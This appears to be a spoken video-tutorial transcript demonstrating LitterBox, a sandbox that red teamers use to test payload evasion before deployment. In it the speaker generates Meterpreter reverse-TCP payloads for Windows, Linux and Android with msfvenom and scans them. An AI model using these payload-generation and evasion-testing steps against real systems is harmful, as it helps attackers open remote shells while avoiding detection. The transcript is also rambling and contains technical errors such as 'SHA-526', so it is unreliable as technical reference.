Hello guys, welcome back to Adventist's Club. Today we're going to solve another tutorial name called LitterBox. So what is this a LitterBox? So a LitterBox is a malware favorite sandbox where red teamers come to bury their payloads. A sandbox environment designed specifically for malware development and payload testing. This web application enables a red teamers to validate a evasion techniques, access a detection signature and test the implant behavior before a deployment in the field. So think of it, your personal litter box for perfecting your tradecraft without leaving a traces or production detection system. The platform provides a automated analysis through an intuitive web interfaces and monitoring process behavior and generating a compressive a runtime analysis and reports. This ensures your payload work as intended before execution in a target environment. Now, what are the main features we can get it here? The main features we can get it here as in the initial analysis like file detections, it will detect like a file type of hash which they use like MD5, SHA-512, otherwise AES algorithm or XYZ things. And Shannon entropy a calculation for encryption detection, advanced file type detections like MIME analysis, and original file name prevention, upload timestamp tracking, and process explorer file analysis for Windows execution like exe, DLL, otherwise sys, otherwise win. There is many type of extensions that will be analyze everything. P file detections like a processor execution by 32 or processor execution by 32 plus. Mission architecture identification, compilation timestamp analysis on subsystem classifications and entry point detections and section enumeration and analysis and import DLL dependencies mapping. And it also look for as office document analysis. So if you are create any type of office payloads like a PDF payload, otherwise XY things like PDF document, XLS, everything. So we already seen in the past tutorials. So how they're going to create like a PDF payload and try to uh, get that one. So now we are going to look here like when you come to an analysis capabilities, like it's like a static analysis engine, like signature based detection using, and as well as we can look something more important like a binary entropy analysis and string extraction analysis and pattern matching for suspicious indicators. Now, when you come to a dynamic analysis engine, like available in two models, like file analysis model, like process ID, like once you look here as process PS, you look here what else you're running as processor ID that will be displayed here. And behavioral monitoring and memory reason inspections, process hallowing detection and injection techniques analysis and sleep pattern monitoring, everything. We can also look like Doppler analysis, it will help you to analyze your payload in a two ways, like a blender and fuzzy. If you look like in a blender, it will scan for active process to collect IOCs and compare these IOCs with your payloads and showing you which process are the closest match. And fuzzy hash, it will help to find a similar code by a sorting known tools in the database and along with using a SSDP to compare your payload with the open source tool showing a matches in a simple way with the both overall the specific source. So let's we would like to do this tutorial. So this is for a litter box. Let's we would like to dump to the this one, so just copy. So let's come back. So first I would like to activate my source virtual environment. Now I just type here as cd as a litter box. So I already clone this repository because it's a lengthy time it will take. So first there is available here, you just try to install here pip install minus r requirements.txt. So Once you have installed the requirements.txt, now so guys, now we would like to look here. Let's come back here. Let me I just close this. So in this, we just try plus minus here. So I just change config to a config. Now this a config to a config file. Now we just type it as a Python litterbox.python to a debug port one. Okay, let we just in a different port. Now let's we just close this. Let's come back. Just type a little bit big. Just type cd as litterbox. Now just type plus minus here. Just type it as Python. I just type sudo su, enter our password, OER tools, pip install OER tools. Now just type here. Now we would like to walk to this a targeted link. Now, where we can see a litter box, a sandbox for your red teams. You can analyze the payload, analyze the process, doppelganger, results of the summary. So, where you can put everything here, like exe file, DLL, bin, document, XLS. So, we would like to we would like to open the folder. I have here a shell.c. Unsupported file, only exes. Okay. Now, I would like to look. I don't have anything else here. Now, if you don't have anything else, so we would like to try to create one exe file and Linux files and everything. We try to analyze everything. So, we would like to go to create a payload. Let's come back. It's like a get. Now, let's open this. Now, we just type here. See, we just type it as clear. Now, we just utilize here as MSF VNUM, payload for as Windows, then put here as meter predator, then you just type it as reverse underscore TCP, then put for lhost equal to enter our target, like address 192.68.18.122, l port equal to 1234, then I would like to get a file type as exe, then get here as test.exe. That's it. Now we would like to wait for this. It will create a payload for us. Now we have get a payload for here. Now let's try this. Try to upload in the home directory. Test.exe. Just open here. Now you need to choose how you want to try here. No executive required runtime behavior analysis. So you would like to look here a static analysis. Now in the summary analysis summary, look, comprehensive overview for all the scans. In the summary, it's clean. Total directions is 0. YARA is clean. No threats were detected. If you create any type of payload, you can check here in this a litter box. Then we would like to come to error. It's also no threats was detected because I didn't add given anything else. It's just a simple payload only for a testing purpose. See check. It's also clean. String analysis cannot access a local variable default with the files where it's not associated with a value. So now we would like to run with as dynamic analysis. So I would like to try here. Now we would like to try this dynamic analysis. Now process for output. We need to wait for a process for output for this. So stake dynamic analysis is completed, but it's still looking. In the summary, it's still analyzing. YARA memory scan results, runtime pattern analysis result, passive. Let's look. Uh, I didn't get anything else. So we would like to try some other big thing. So it's take a lengthy time. Now we would like to look here. Uh, process analysis. So if you enter a process analysis, so we would like to look here as a processor ID, which I was running now. Now I would like to look run is something like a Wireshark. Let's look this now. I just put here as a processor. No, I didn't get anything else here, even if it running also. I would like to try as something to run as processor. Let's we would like to try this for running as processor ID. So otherwise, what else we have? Our processor ID, we just try with that. PS. So I just copy this processor ID. Let's come back. This will perform a dynamic analysis. So you just look here. It was a clean everything in the dynamic analysis. Everything is clean, which was done here. So YARA memory scan. It not have detected anything else. So this is only for testing. I'm not doing anything else here. We would like to come back. Close all. It was clean everything. Monitor, pivot, then everything is clean here. So it's just a simple payload. We would like to look here as a drop langer. Now try here as new scan payload list here, which I was provided here, vendor analyzer and fuzzy analyzer also. In the fuzzy analyzer, you can look here where you have got here. In the database info, it is like database size is 19.89 MB. After it was installed, it will not be get here. GitHub with the malware suite, where we have got which I was created with a payload with the malware suite. You can look here as show more. So entirely with the source code you can get here. So if you want to create a database, you can create here Hell Bunny, Dark Widow. There is a lot of things with this. You can analyze all. You can also look like a payload list. That's it here. Now results for a summary. Uh, it was a low risk for test.exe. Storage, it was used 72 kilobytes. After you install, it will become like 19 by 19 MB. Now, we would like to try to go a further. Uh, Try to go further like we try to go as with the Linux now. Now we would like to go for as a Linux. I would like to go back. So analyze the processor ID. So I don't want this. So let me just shut down. Now you just type it as msfbina. Now I just here as a file type as Linux ELF. So here is my answer. Let's now put here as a Linux x86. That's it. Metapita reverse underscore TCP. ELF file type I would like to get as ELF. That's it. I just put, oh sorry, I just need to put as ELF. Error invalid. Okay, so I was made a mistake here. Then place again. Let's, we would like to try this. So where I have created now, let me just clear this. Let's come back. Now we can go for a analyzer payload. You just put here as a linux.elf file. Now we would like to analyze. Okay, we would like to load this. YARA, it was clean everything. So scan duration 0.08 milliseconds. So we would like to look here is YARA checklist and everything. Now we would like to look here run dynamic analysis. So it may also take a little bit some time to present all the output. We would like to look here monitor. So it's take a little bit lengthy time process to analyze here again. So may also take a little bit lengthy time process. So even you can see here, I would like to go, that one is going for analysis. Now we would like to try to generate one more payload for as Android. So just type it as MSFVina payload for as Android. Now just put here as meter predator, then you just put here as a reverse underscore TCP. Then put here as lhost equal to enter our target IP address 192.168.122 L port equal to 5678. Now file type is as APK. Now just put here as android.apk. That's it. Now we can see it's asking like a format. So I don't want to make anything else, so I just need to put here as I don't want to delete everything, just generate. So I have got here as APK file also. So it's take again a lengthy time process. Now we would like to look here as system scan. Here it's still looking. Now we would like to try this. So we would like to try here as no, we didn't get. So it not accept the APK file. So even if you have a APK file, it never accept as APK file. Okay, we just leave it here as Linux test.exe. So only exe files are everything. Maximum file size is 100 MB. Now we would like to look here analyze process. So we never would get this. So we would like to payload list compare no, because matching list. So we just need to wait over there. No matching list above as 50% risk confidence. Now we would like to look here is here low risk show all process analysis. You can look here, process analysis results. There is nothing else, no process analysis results is found. Now let's total files. We would like to look this. Click on here, go to home. So because it's not going to be get done because we was stuck. The risk assessment is filed. It will be presented with MD5 SHA-526. It's unbreakable of this SHA to crack. 3 detections is fine. Invalid process explorer checks up. Common modifications packed files. 83% is correlations with the malware. Found 2 suspicious API import. A review in the API import. So you just need to look everything. Kernel 32 there. And dot text. Then our data and results. Calculated with checksum, this is presented. It's well and good. Now once you look here, this in the static analysis, in the dynamic analysis, is everything is clean, and let's know output is came. If there is a captured something, you have get the output results also. Now let's that's it here. So you can try your own. That's it, guys. So you try to run, guys. Thank you guys for watching and keep smiling.